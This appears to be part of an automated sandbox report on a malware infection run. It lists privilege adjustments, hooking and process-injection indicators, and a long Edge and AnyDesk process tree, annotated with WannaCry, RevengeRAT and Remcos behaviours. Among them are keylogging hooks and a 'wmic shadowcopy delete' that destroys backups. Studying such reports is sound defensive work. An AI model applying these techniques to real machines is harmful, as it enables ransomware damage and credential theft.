- AnyDesk.exe 4548: SeDebugPrivilege
- WMIC.exe 5616: the full administrator set, enabled twice (SeIncreaseQuota, SeSecurity, SeTakeOwnership, SeLoadDriver, SeSystemProfile, SeSystemtime, SeProfSingleProcess, SeIncBasePriority, SeCreatePagefile, SeBackup, SeRestore, SeShutdown, SeDebug, SeSystemEnvironment, SeRemoteShutdown, SeUndock, SeManageVolume, plus privileges 33 to 36 shown by LUID). WMIC enables every privilege its token holds before issuing a WMI call, and together with the vssvc.exe entry this is consistent with a wmic shadowcopy delete (see "Deletes shadow copies")
- vssvc.exe 3512: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege (the Volume Shadow Copy service being driven)
- taskse.exe 4512, 5328, 6128, 992, 5912, 5936, 5204: SeTcbPrivilege, twice each. taskse.exe is the WannaCry helper that launches the decryptor window in every interactive session, which needs SeTcb to obtain the session tokens
- RevengeRAT.exe 5524 and RegSvcs.exe 5964: SeDebugPrivilege, the privilege a process enables before opening another process for injection (matches the SetThreadContext chain above)
Suspicious use of FindShellTrayWindow (64 IoCs)
- msedge.exe 3060 (55 entries); AnyDesk.exe 1592 (8), 220 (1)

Suspicious use of SendNotifyMessage (52 IoCs)
- msedge.exe 3060 (44 entries); AnyDesk.exe 1592 (8)

Suspicious use of SetWindowsHookEx (37 IoCs)
- AnyDesk.exe 220 (2)
- @[email protected] 5340, 3828, 1244 (2 each); 3244, 3736, 2708, 772, 2768, 3908, 5932 (1 each)
- iexplore.exe 5320 (1)
- WINWORD.EXE 1936 (4), 5740 (17)
The hook installed by iexplore.exe 5320 is the one that matters: that process was hollowed by Userdata.exe (Remcos), and SetWindowsHookEx is the standard user-mode keylogging mechanism, matching the logs.dat it writes under SysWOW64\remcos. The browser, AnyDesk and Word entries are ordinary UI behaviour.

Suspicious use of WriteProcessMemory (64 IoCs)
- msedge.exe 3060 wrote to the memory of PIDs 1184, 3024, 3196 and 1164 (procid_target 83 to 86). All 64 entries are the browser launching its own renderer and utility processes and are benign.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
pid   Process
5548  attrib.exe
5772  attrib.exe
Processes
Process tree ([depth n] is the nesting level of the process in the tree; flags listed under each process are the behaviours the sandbox attributed to it)

[depth 1] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bloxflip.com/a/kriszti
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID: 3060

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9d046f8,0x7ffba9d04708,0x7ffba9d04718
  PID: 1184
  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
  PID: 3024

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
  - Suspicious behavior: EnumeratesProcesses
  PID: 3196

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  PID: 1164

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  PID: 4488

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  PID: 436

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
  PID: 3492

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
  PID: 5108

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  PID: 2808

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  PID: 5116

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
  PID: 2216
  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 3224

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
  PID: 3924

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  PID: 1140

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
  PID: 3200

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  PID: 3328

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
  PID: 4304

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
  PID: 772

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
  PID: 1020

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
  PID: 1444

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
  PID: 4180

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
  PID: 5388

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6548 /prefetch:8
  PID: 5624

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2996 /prefetch:1
  PID: 6068

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
  PID: 5332

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2752 /prefetch:8
  PID: 5924

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
  PID: 5896

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5388 /prefetch:8
  PID: 4092

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 5476
  [depth 2] "C:\Users\Admin\Downloads\AnyDesk.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 1476

  [depth 2] "C:\Users\Admin\Downloads\AnyDesk.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 1832

    [depth 3] "C:\Users\Admin\Downloads\AnyDesk.exe" --local-service
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4548

      [depth 4] "C:\Users\Admin\Downloads\AnyDesk.exe" --backend
      - Executes dropped EXE
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      PID: 220

    [depth 3] "C:\Users\Admin\Downloads\AnyDesk.exe" --local-control
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID: 1592
  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4940 /prefetch:2
  - Suspicious behavior: EnumeratesProcesses
  PID: 5328

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
  PID: 6132

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  PID: 3912

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  PID: 4152

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:1
  PID: 6060

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:1
  PID: 5300

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  PID: 3828

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  PID: 1188

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
  PID: 4404

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
  PID: 4760

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:1
  PID: 2612

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7900 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 2676

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
  PID: 4048

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1
  PID: 1768

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2144 /prefetch:1
  PID: 3496

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
  PID: 3172

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:1
  PID: 1968

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7268 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 5272

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
  PID: 4800

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 460

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
  PID: 5768

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7524 /prefetch:1
  PID: 5208

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
  PID: 5104

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
  PID: 2180

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:1
  PID: 3172

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8300 /prefetch:1
  PID: 2364

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7680 /prefetch:1
  PID: 5720

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
  PID: 2464

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7384 /prefetch:1
  PID: 2276

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:1
  PID: 5528

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8644 /prefetch:1
  PID: 3436

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:1
  PID: 3012

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8736 /prefetch:1
  PID: 2736

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 3596

  [depth 2] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9204 /prefetch:1
  PID: 1796
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4148
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2848
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x498 0x3041⤵
- Suspicious use of AdjustPrivilegeToken
PID:5668
-
